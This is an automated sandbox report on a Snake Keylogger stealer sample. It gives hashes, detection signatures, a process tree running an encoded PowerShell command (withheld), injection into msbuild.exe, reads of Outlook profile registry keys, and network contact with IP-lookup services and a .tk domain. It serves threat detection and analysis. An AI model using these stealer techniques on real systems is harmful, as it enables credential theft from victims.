Malware Analysis Report

2024-10-18 23:14

Sample ID: 240514-bnfvnadh36
Target: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
SHA256: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
Tags: snakekeylogger, collection, execution, keylogger, stealer
Score: 10/10

Table of Contents

- Analysis Overview
- MITRE ATT&CK
  - Enterprise Matrix V15
- Analysis: static1
  - Detonation Overview
  - Signatures
- Analysis: behavioral1
  - Detonation Overview
  - Command Line
  - Signatures
  - Processes
  - Network
  - Files
- Analysis: behavioral2
  - Detonation Overview
  - Command Line
  - Signatures
  - Processes
  - Network
  - Files

Analysis Overview

Score: 10/10

SHA256: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a

Threat Level: Known bad

The file 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe was found to be: Known bad.

Malicious Activity Summary

Tags: snakekeylogger, collection, execution, keylogger, stealer

Snake Keylogger payload

Snake Keylogger

Detects executables with potential process hooking

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables packed with or using KoiVM

Detects executables referencing many email and collaboration clients. Observed in information stealers.

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Unsigned PE

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_win_path

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-14 01:17

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-14 01:17

Reported: 2024-05-14 01:20

Platform: win7-20240508-en

Max time kernel: 121s

Max time network: 124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-14 01:17

Reported: 2024-05-14 01:20

Platform: win10v2004-20240426-en

Max time kernel: 136s

Max time network: 131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

Signatures

Snake Keylogger

Tags: stealer, keylogger, snakekeylogger

Snake Keylogger payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detects executables packed with or using KoiVM

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers.

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Detects executables with potential process hooking

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook profiles

Tags: collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3932 set thread context of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 228 wrote to memory of 3996 | N/A | C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe | C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 3996 | N/A | C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe | C:\Windows\system32\cmd.exe
PID 3996 wrote to memory of 3932 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 3932 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 1912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3932 wrote to memory of 1912 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1912 wrote to memory of 5072 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1912 wrote to memory of 5072 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 2896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 3932 wrote to memory of 3392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe

"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand <encoded command not included in this report>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand <encoded command not included in this report>

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CD5.tmp" "c:\Users\Admin\AppData\Local\Temp\ha2fknko\CSC89ACB1CE5D8B40638E6CFC2FB9D17C36.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 scratchdreams.tk udp
US 104.21.27.85:443 scratchdreams.tk tcp
US 8.8.8.8:53 85.27.21.104.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3932-2-0x00007FFC216D3000-0x00007FFC216D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_foeig5pp.qrb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3932-4-0x000001902F7C0000-0x000001902F7E2000-memory.dmp

memory/3932-13-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.0.cs

MD5 2d582d49bc5da0270e19e27903336497
SHA1 01065a81afc9e4ec356ef1998ec15535f7ea5d09
SHA256 1104ec9aaa6d72466e966359f4e147da4a11ac8ba4c1d36f45fdf83ee76e16dc
SHA512 03ef2d744cc6152d5723574d34bf06c5bd65264999e8eade3e48159367fb05067cd071ee37225947ff4b9286d0f11b6963e2d42a1e9c26a3ffc47b76bbf3a5e6

C:\Users\Admin\AppData\Local\Temp\RES5CD5.tmp

MD5 f69b126321b2461b146fcbb4e7b909e8
SHA1 811bb1f45085e6e6d9ed54719a6de5cda27cdd64
SHA256 892dccac2e71472da160254e15c11e949f2f3fbc9c46578df8873a5707b7c3fc
SHA512 e1dccd0b3b3434de28e0d1cfe8c4dd6f791dd600bcc9f8ada49be97c317ff43ebfa5f760459eeae3687278bdf009b8fc8f1e379aeff3007347c7b0e27a764ded

C:\Users\Admin\AppData\Local\Temp\file-jmd88vyip.tmp

MD5 fec0ee7beb18cfe6da97e99a57898163
SHA1 f9bfefcfe79858383586541d2ec250e0060fc42c
SHA256 301f949a952c4705d69f2d7fcaf13e7055542142d249f7e57793c3548f1c56f7
SHA512 2a263c00c95654c7b0ab784f372d59183bf21132ddf4a39a4935cf17a98e1b760fc26ed217c415d1ddeeac8595477e1503fd917d8b878771da7a9501c3c29362

memory/3932-30-0x0000019031C30000-0x0000019031C3A000-memory.dmp

memory/3932-27-0x0000019031C20000-0x0000019031C28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.dll

MD5 107bbe27554d1bdd9f9f4e1475153cc4
SHA1 b7163ef0d7cd1c217c2614d264fa822450cb0d20
SHA256 41518603317cdae8e4bba16527224e3c2f5ae6210003b384929d4e24441f58b1
SHA512 5e53e487139c8b11cfd710851c5c862914c87d741c298d48c1d3d2e64f2b4de9b0381eeed9ff78bc9c99803e9dc3feddc60340fe5aa4201775da57a4398e5f7c

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\CSC89ACB1CE5D8B40638E6CFC2FB9D17C36.TMP

MD5 4347b0508841d3e260f5ee7bd425e02c
SHA1 d39c6a1dae168d2bd576c2adce0d3cb44b05c900
SHA256 e84257f8590c0f3c83ce20aaa934212b7c7d26db549f66b7fb9f965fee67a428
SHA512 195a2ba2783364611e6356f9f8d6c5e8f8d39e7965c2af286841be5bd4426fd1d79bf38f35fe8165e105ef77256f74ed72ce792fce641fa14bca786789af3ec4

\??\c:\Users\Admin\AppData\Local\Temp\ha2fknko\ha2fknko.cmdline

MD5 33b777cbde458906aef2afc3416ec74a
SHA1 632fe15f52269595f5c1089ec14d13d9eb5dda33
SHA256 5829454223d3bcb85c080953a2064d1389a6be87fba20117e5eb072028aad009
SHA512 102ce199453dbb77d07c31e721ccaf95ddbdbc1e8ca13697218206661fba3cf3c4983d46ffa591047d37f22f8f9111aa71d3796dce88391ae1d4a340b54e0e29

memory/3932-14-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

memory/3932-31-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

memory/3932-32-0x0000019031DB0000-0x0000019031E2A000-memory.dmp

memory/2896-33-0x0000000000400000-0x0000000000426000-memory.dmp

memory/2896-34-0x00000000058E0000-0x0000000005E84000-memory.dmp

memory/2896-35-0x0000000005330000-0x00000000053CC000-memory.dmp

memory/3932-36-0x00007FFC216D3000-0x00007FFC216D5000-memory.dmp

memory/3932-37-0x00007FFC216D0000-0x00007FFC22191000-memory.dmp

memory/2896-38-0x0000000006510000-0x0000000006560000-memory.dmp

memory/2896-39-0x0000000006730000-0x00000000068F2000-memory.dmp

memory/2896-40-0x0000000006600000-0x0000000006692000-memory.dmp

memory/2896-41-0x0000000006590000-0x000000000659A000-memory.dmp